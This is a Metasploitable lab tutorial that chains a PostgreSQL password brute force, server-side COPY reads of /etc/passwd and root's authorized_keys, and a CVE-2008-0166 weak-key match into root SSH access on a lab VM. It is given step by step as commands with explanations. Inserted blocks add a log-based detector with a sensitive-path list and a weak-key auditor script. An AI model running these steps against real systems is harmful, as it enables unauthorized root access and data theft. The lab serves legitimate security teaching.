




(Metasploitable Project: Lesson 12)

{ Postgres SQL Bruteforce, Obtain and Crack root SSH Key }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard stories of how hackers were able to use a database to ultimately obtain root access to the server? This lesson illustrates why strong passwords and proper file permissions are an absolute necessity in today's digital age.

  2. What is Metasploitable 
  3. Pre-Requisite Lab
  4. What is auxiliary/scanner/postgres/postgres_login?
    • This Metasploit module simply tries a specific user/password pair (or list) against the PostgreSQL database (the default user is postgres).

  5. What is exploit CVE-2008-0166?
    • OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
      • We will use this exploit to download 32768 potential ssh private/public key pairs for a future brute force attack.
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166

  6. Reference
    • Special Thanks goes to @Japtron for providing the blueprint for this complicated attack vector.

  7. Lab Notes
    • In this lab we will do the following:
      1. Run a basic NMAP scan.
      2. Run an NMAP Scan using service version detection.
      3. Search for the ssh and postgres daemon using NMAP version scan.
      4. Download SSH RSA 2048 public/private key repository for Bruteforce key matching.
      5. Use Metasploit to correctly guess the Postgres SQL postgres password.
      6. Copy the contents of /root/.ssh/authorized_keys into a table.
      7. Use the public key from authorized_keys to search the RSA repository for the matching private key.
      8. Use found private ssh key to login to Metasploitable as root.

  8. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • Changing the adapter from NAT to Bridged opens the VM and your network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, or (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Retrieve IP Address
    • Instructions:
      1. ifconfig
      2. Record Your Metasploitable IP Address.
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.116.
      • Record your IP Address.

     

Section 4: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
      2. Record your IP Address (See Picture)
    • Note(FYI):
      • My IP address 192.168.1.139.
      • In your case, it will probably be different.
      • This is the machine that will be used to attack the victim machine (Metasploitable).

     

Section 5: Scanning the Victim with NMAP
  1. Run Basic NMAP Scan against the Metasploitable VM  (On BackTrack)
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from [Section 2, Step 2].
    • Instructions:
      1. nmap 192.168.1.116
      2. Notice nmap displays many services including 5432/postgresql and 22/ssh.
    • Note(FYI):
      • nmap is being used to scan all the TCP ports for listening services.
      • This is pretty great, but it would be nice to know the version of each service.

     

  2. NMAP Version Scan
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. nmap -sV -p5432,22 192.168.1.116
      2. Notice nmap shows the version of ssh (OpenSSH 4.7p1 Debian 8ubuntu1) and postgresql (PostgreSQL DB 8.3.0 - 8.3.7).
    • Note(FYI):
      • nmap -sV is used to detect the version of each service. 
      • You can use version information to search places like http://www.exploit-db.com -or- http://cve.mitre.org to find vulnerabilities.
      • In this case, we will be exploiting a vulnerability that exists in OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems that use a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

 

Section 6: Download Cryptographic Keys
  1. Download the SSH Key Archive (On BackTrack)
    • Instructions:
      1. cd /var/tmp
      2. wget --no-check-certificate http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson12/5622.tar.bz2
        • Where " " is a space.
    • Note(FYI):
      1. Use (cd) to change directory to the /var/tmp directory.
      2. Use (wget) to download the file (5622.tar.bz2).  The flag (--no-check-certificate) tells wget not to verify the SSL certificate; it has no effect on a plain http:// URL such as this one.

     

  2. Extract the SSH Key Archive (On BackTrack)
    • Instructions:
      1. ls -l 5622*
      2. tar xvjf 5622.tar.bz2
    • Note(FYI):
      1. Use (ls -l) to display the details of the 5622.tar.bz2 tar file, which contains approximately 32768 potential ssh key pairs for the later brute force key match.
      2. Use (tar) to extract the tar file (5622.tar.bz2). FYI: x is to extract, v is verbose, j selects bzip2 compression, and f specifies the file.

 

Section 7: Attacking the Victim with Metasploit
  1. Start Up Metasploit msfconsole (On BackTrack)
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole
      • Your picture (Rabbit, Cow, Graffiti, Cyber Missile, etc.) will probably be different than mine.

     

  3. Search for Metasploit Module
    • Instructions:
      1. search postgres
      2. Highlight and Right Click on auxiliary/scanner/postgres/postgres_login
      3. Select Copy

     

  4. Set Metasploit Module
    • Instructions:
      1. use auxiliary/scanner/postgres/postgres_login
      2. show options
      3. In the following steps we will set STOP_ON_SUCCESS and RHOSTS.

     

  5. Set STOP_ON_SUCCESS and RHOSTS
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. set RHOSTS 192.168.1.116
      2. set STOP_ON_SUCCESS true
      3. show options
    • Note(FYI):
      1. RHOSTS is set to Metasploitable's IP Address.
      2. STOP_ON_SUCCESS is set so the module stops guessing passwords as soon as a credential pair works.

     

  6. Brute Force Postgres Password
    • Instructions:
      1. exploit
      2. Notice the Postgres Database username (postgres) and password (postgres) were successfully guessed.
      3. exit

 

Section 9: Working with Postgres SQL
  1. Install PostGreSQL (On BackTrack)
    • Instructions:
      1. apt-get install postgresql
      2. Do you want to continue [Y/n]? Y
    • Note(FYI):
      1. If postgresql is not found in the repository, then you must update the sources.list repository by following the directions in (Install BackTrack 5R1 Lesson 1, Section 7, Step 1).

     

  2. Determine PostgreSQL Version
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. psql -h 192.168.1.116 -U postgres
      2. Password for user postgres: postgres
      3. select version();
    • Note(FYI):
      1. The first command allows you to log onto the Postgres SQL database that resides on the Metasploitable VM. The flag (-h) specifies a remote host and (-U) specifies the username that you wish to use.
      2. select version() displays the version of Postgres Database, the OS Kernel and the version of the C++ compiler.

     

  3. Display and Create Users
    • Instructions:
      1. select * from pg_user;
      2. CREATE USER hacker WITH PASSWORD 'abc123';
      3. select * from pg_user;
      4. ALTER USER hacker WITH SUPERUSER;
      5. select * from pg_user;
    • Note(FYI):
      1. The query (select * from pg_user) displays all usernames of the database.
      2. The statement (CREATE USER hacker WITH PASSWORD 'abc123') allows you to create the username (hacker) with password (abc123).
      3. Notice when username hacker is first created the SUPERUSER role (usesuper) is set to false.
      4. The statement (ALTER USER hacker WITH SUPERUSER) allows you to make the username (hacker) a superuser.
      5. Notice the username hacker's SUPERUSER role (usesuper) is now set to true.

     

  4. Show Schemas and Databases
    • Instructions:
      1. \dn
      2. \l
    • Note(FYI):
      1. \dn, will display all schemas.
      2. \l, will display all databases.

     

  5. Create Table Capture /etc/passwd
    • Instructions:
      1. CREATE TABLE accounts (linux_users TEXT);
      2. COPY accounts from '/etc/passwd';
      3. select * from accounts where linux_users like '%bash%';
    • Note(FYI):
      1. Create a table called accounts.
      2. Copy the /etc/passwd file into the accounts table.  This is very sneaky, because it shows a technique to gather sensitive information without having shell access (i.e., a terminal window) on the server.
      3. Display records from the accounts table that contain the string "bash".  This is important, because users with a /bin/bash shell have the ability to log in to the server remotely.

     

  6. Retrieving root's authorized_keys file
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. CREATE TABLE sshkeys (auth_key TEXT);
      2. select * from accounts where linux_users like '%bash%';
      3. COPY sshkeys from '/root/.ssh/authorized_keys';
      4. \q
      5. psql -h 192.168.1.116 -U postgres -c 'select * from sshkeys limit 1' | tee sshkeys.txt
      6. Password for user postgres: postgres
      7. Notice the ssh-rsa key that we retrieved from a poorly protected /root/.ssh/authorized_keys file.
    • Note(FYI):
      1. Create a table named sshkeys.
      2. Show only potential victim accounts with a /bin/bash shell.
      3. Copy root's authorized_keys file into the sshkeys table.  This is only possible because of improper permissions.
      4. \q, quit or exit the database.
      5. -c 'select * from sshkeys limit 1': the (-c) flag will allow you to execute a query remotely from the command line without invoking the psql shell.  tee sshkeys.txt displays the output and also writes it to a file (sshkeys.txt).
      6. Step 7 displays the public key for which we now have to find the corresponding private key.
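Both of the database-side activities in this lesson (the password guessing in Section 7 and the server-side COPY file reads in Section 9, Steps 5 and 6) leave distinctive lines in the PostgreSQL server log. The following detector is an added example, not part of the original lesson or of the Metasploitable project: it assumes the server runs with log_connections = on, log_statement = 'all' and a log_line_prefix of '%t [%p] %h ' so that each line carries a timestamp, backend PID and client host, and the sample log it parses is constructed to match that layout. The "password authentication failed" and "statement:" message texts are the real PostgreSQL messages; the threshold, window and path list are assumptions you would tune.

```python
"""Detect PostgreSQL password brute force and server-side COPY file reads.

Added example (not from the lesson). Assumed log_line_prefix: '%t [%p] %h '.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ "   # %t: time and zone
    r"\[(?P<pid>\d+)\] (?P<host>\S+) "                     # [%p] %h
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# Real PostgreSQL message texts (password auth failure, log_statement output).
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
COPY_FILE_RE = re.compile(r"^statement:\s+COPY\s+\S+\s+FROM\s+'(?P<path>/[^']*)'", re.I)
# Assumed list: server-side reads of these paths are rated high severity.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/root/", "/.ssh/")


def parse_line(line):
    """Split one log line into prefix fields and message; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect(lines, threshold=5, window_seconds=60):
    """Return alerts found in an iterable of log lines.

    ('BRUTE_FORCE', host, user, failures_in_window) fires once per host when
    `threshold` FATAL password failures arrive within `window_seconds`.
    ('FILE_READ', host, path, severity) fires for every COPY ... FROM '/file'
    (COPY FROM STDIN does not match, since it reads no server file).
    """
    alerts = []
    failures = defaultdict(deque)   # host -> timestamps of recent failures
    already_flagged = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host, ts, msg = rec["host"], rec["ts"], rec["msg"]

        auth = AUTH_FAIL_RE.search(msg)
        if auth and rec["level"] == "FATAL":
            recent = failures[host]
            recent.append(ts)
            while ts - recent[0] > timedelta(seconds=window_seconds):
                recent.popleft()            # drop failures outside the window
            if len(recent) >= threshold and host not in already_flagged:
                already_flagged.add(host)
                alerts.append(("BRUTE_FORCE", host, auth["user"], len(recent)))
            continue

        copy = COPY_FILE_RE.search(msg)
        if copy:
            path = copy["path"]
            severity = "high" if any(s in path for s in SENSITIVE_PATHS) else "medium"
            alerts.append(("FILE_READ", host, path, severity))
    return alerts


# Constructed sample log (not captured from a real server), in the assumed layout.
SAMPLE_LOG = """\
2015-03-01 10:00:01 UTC [4101] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:02 UTC [4102] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:02 UTC [4103] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:03 UTC [4104] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:03 UTC [4105] 10.0.0.5 FATAL:  password authentication failed for user "app"
2015-03-01 10:00:04 UTC [4106] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:05 UTC [4107] 192.168.1.139 FATAL:  password authentication failed for user "postgres"
2015-03-01 10:00:09 UTC [4108] 192.168.1.139 LOG:  connection authorized: user=postgres database=postgres
2015-03-01 10:00:20 UTC [4108] 192.168.1.139 LOG:  statement: CREATE TABLE accounts (linux_users TEXT);
2015-03-01 10:00:25 UTC [4108] 192.168.1.139 LOG:  statement: COPY accounts from '/etc/passwd';
2015-03-01 10:00:30 UTC [4108] 192.168.1.139 LOG:  statement: select * from accounts where linux_users like '%bash%';
2015-03-01 10:00:40 UTC [4108] 192.168.1.139 LOG:  statement: COPY sshkeys from '/root/.ssh/authorized_keys';
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single host 10.0.0.5 failure stays below the threshold and produces nothing, while the burst from 192.168.1.139 fires once at the fifth failure and the two server-side COPY statements are each reported. Note that the COPY reads only succeed because the connection holds the superuser role and the files are readable by the postgres OS user; a guessable superuser password and a world-readable /root/.ssh/authorized_keys are the two conditions this detector is watching for evidence of.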

     

  7. Search and Find SSH Private Key
    • Instructions:
      1. ls -l sshkeys.txt
      2. grep "ssh-rsa" sshkeys.txt | awk '{print $2}'
      3. grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
      4. fgrep `grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'` /var/tmp/rsa/2048/*pub | tee keys.txt
    • Note(FYI):
      1. Use (ls -l) to display the file ownership, permissions, and byte size of the sshkeys.txt file.
      2. Use (grep) to search for "ssh-rsa" in the sshkeys.txt file.  Use (awk) to display the second column of the output separated by white space.
      3. Same as above, except we will use (sed) to remove "==" that is at the end ($) of the line.
      4. Use (fgrep) to search the previously downloaded ssh public keys for the string output by command #3.  This will take between 5 and 10 minutes to run.
        • Eg., fgrep `command #3` public_keys
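The fgrep in Step 7 compares a raw base64 blob against the 32768-key archive; the same comparison is how a defender audits a host's authorized_keys files for CVE-2008-0166 keys. The script below is an added example, not code from the lesson or from the Metasploitable project: it parses each authorized_keys line (including lines with a leading options field), decodes the ssh-rsa wire format to recover the modulus size, computes the OpenSSH-style SHA256 fingerprint, and reports any key whose fingerprint is in a weak-key set or whose modulus is shorter than an assumed 2048-bit minimum. The two sample keys and the one-entry weak-key set are constructed with arbitrary moduli, so they are neither real RSA keys nor real Debian weak keys; `load_weak_fingerprints` is the helper you would point at a directory such as /var/tmp/rsa/2048 from Section 6.

```python
"""Audit authorized_keys lines against a set of known-weak public keys.

Added example, not part of the lesson. Sample keys below are constructed.
"""
import base64
import hashlib
import struct
from pathlib import Path


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """SSH wire-format mpint: big-endian, with a leading 0x00 if the MSB is set."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def encode_rsa_pubkey(e: int, n: int) -> bytes:
    """Build the blob that base64-encodes into the second field of an ssh-rsa line."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def _read_string(blob: bytes, off: int):
    (length,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + length], off + 4 + length


def parse_pubkey_line(line: str):
    """Parse one authorized_keys line; None for blank lines and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    for i, tok in enumerate(fields):           # skip an optional options field
        if tok.startswith(("ssh-", "ecdsa-")) and i + 1 < len(fields):
            key_type, b64, comment = tok, fields[i + 1], " ".join(fields[i + 2:])
            break
    else:
        return None
    blob = base64.b64decode(b64)
    # Same fingerprint ssh-keygen -lf prints: SHA256 of the decoded blob, unpadded base64.
    fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    bits = None
    if key_type == "ssh-rsa":
        _, off = _read_string(blob, 0)          # "ssh-rsa"
        _, off = _read_string(blob, off)        # e
        n_bytes, _ = _read_string(blob, off)    # n
        bits = int.from_bytes(n_bytes, "big").bit_length()
    return {"type": key_type, "fingerprint": fp, "bits": bits, "comment": comment}


def load_weak_fingerprints(pub_dir: str) -> set:
    """Fingerprint every *.pub file under a directory (e.g. /var/tmp/rsa/2048)."""
    fps = set()
    for path in Path(pub_dir).rglob("*.pub"):
        for line in path.read_text(errors="replace").splitlines():
            key = parse_pubkey_line(line)
            if key:
                fps.add(key["fingerprint"])
    return fps


def audit_authorized_keys(text: str, weak_fingerprints: set, min_rsa_bits: int = 2048):
    """Return (line_number, finding, detail) for every weak or undersized key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        key = parse_pubkey_line(line)
        if key is None:
            continue
        if key["fingerprint"] in weak_fingerprints:
            findings.append((lineno, "KNOWN_WEAK_KEY", key["fingerprint"]))
        if key["bits"] is not None and key["bits"] < min_rsa_bits:
            findings.append((lineno, "RSA_TOO_SHORT", f'{key["bits"]} bits'))
    return findings


# Constructed sample keys: arbitrary odd moduli, NOT real RSA keys or Debian weak keys.
_WEAK_N = (1 << 2047) | 0x1234567       # 2048-bit
_SHORT_N = (1 << 1023) | 0x7654321      # 1024-bit
WEAK_PUB_LINE = "ssh-rsa " + base64.b64encode(encode_rsa_pubkey(65537, _WEAK_N)).decode() + " weak@example"
SHORT_PUB_LINE = "ssh-rsa " + base64.b64encode(encode_rsa_pubkey(65537, _SHORT_N)).decode() + " short@example"
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys for the example",
    WEAK_PUB_LINE,
    'no-pty,from="10.0.0.0/8" ' + SHORT_PUB_LINE,
])
# Stand-in for the fingerprints of the downloaded weak-key archive.
SAMPLE_WEAK_SET = {parse_pubkey_line(WEAK_PUB_LINE)["fingerprint"]}

if __name__ == "__main__":
    weak = load_weak_fingerprints("/var/tmp/rsa/2048") if Path("/var/tmp/rsa/2048").is_dir() else SAMPLE_WEAK_SET
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, weak):
        print(finding)
```

Comparing fingerprints instead of grepping the base64 text means a key is matched regardless of trailing "==" padding, options fields or comments, which is exactly the cleanup the sed and awk steps above are doing by hand.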

     

  8. Use SSH Private Key to become root
    • Note(FYI):
      • Replace (192.168.1.116) with the IP address of your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. cat keys.txt
      2. cat keys.txt | awk -F: '{print $1}'
      3. cat keys.txt | awk -F: '{print $1}' | sed 's/\.pub$//'
      4. ssh -i `cat keys.txt | awk -F: '{print $1}' | sed 's/\.pub$//'` root@192.168.1.116
      5. yes
      6. id
      7. exit
    • Note(FYI):
      1. Use (cat) to display the keys.txt file.
      2. Use (awk) to display the first column of the keys.txt file that is delimited by a ":".
      3. Use (sed) to remove ".pub" from the output of command #2.
      4. Use (ssh) to establish a secure connection; use the (-i) flag to specify the sshkey; connect as username root to the metasploitable VM.  Below is the actual command.
        • ssh -i /var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.116
      5. Answering (yes) will add Metasploitable's RSA host key to BackTrack's known_hosts file.
      6. Use (id) to show the real and effective username.  Notice you are root.
      7. Use (exit) to exit from the ssh connection into the metasploitable VM.

     

Section 10: Proof of Lab
  1. Proof of Lab (On BackTrack)
    • Instructions
      1. grep "ssh-rsa" sshkeys.txt | awk '{print $2}' | sed 's/==$//'
      2. cat keys.txt | awk -F: '{print $1}' | sed 's/\.pub$//'
      3. ssh -i /var/tmp/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.116 "id;hostname"
        • Where " " is a space.
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle

